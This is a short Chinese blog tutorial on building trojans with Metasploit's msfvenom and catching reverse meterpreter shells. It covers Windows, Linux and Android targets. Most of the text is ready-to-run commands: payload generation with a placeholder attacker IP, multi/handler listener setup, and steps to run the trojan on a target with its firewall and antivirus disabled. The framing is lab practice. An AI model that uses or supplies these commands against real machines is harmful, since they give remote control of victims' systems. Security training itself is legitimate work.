MSF 原始渗入思路

基本思路:

  1. 攻击机生成木马
  2. 移动木马到靶机
  3. 攻击机开启监听
  4. 靶机运行木马(关闭安全软件)
  5. 攻击机进行操作

Windows:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=4444 -f exe > shell.exe
  1. 将木马放入同一个网段的Windows攻击机(关闭防火墙,关闭Windows defender)

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload windows/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.运行靶机上的shell.exe
5.攻击机上会出现

meterpreter>

  1. 成功


Linux:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom  -p linux/x64/meterpreter/reverse_tcp LHOST=1攻击机ip LPORT=4444  -f elf  >shell
  1. 将木马放入同一个网段的Linux攻击机(关闭防火墙)

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload linux/x64/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.运行靶机上的shell

./shell

5.如果无法运行就赋予权限

chmod 777 shell 
#在放shell的文件夹里运行,再运行
./shell

6.攻击机上会出现

meterpreter>

  1. 成功


Android:

  1. 利用msfvenom制作(在攻击机上操作)
msfvenom -p android/meterpreter/reverse_tcp lhost=攻击机ip lport=4444 R > shell.apk
  1. 将木马放入同一个网段的安卓模拟机

  2. 利用msf开启监听(在攻击机上操作)

msfconsole 
#开启metasploit
use exploit/multi/handler
#使用相关攻击模块
set payload android/meterpreter/reverse_tcp
#监听方式
show options
#查看其他参数,如果没有部署LHOST,则写入下面语句
set LHOST 攻击机IP
run
#开启监听

4.点击MainActive运行靶机上的木马
5.如果无法运行就去设置赋予权限
6.攻击机上会出现

meterpreter>

  1. 成功

没发现这过程就是复制粘贴,改了几句话吗?

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值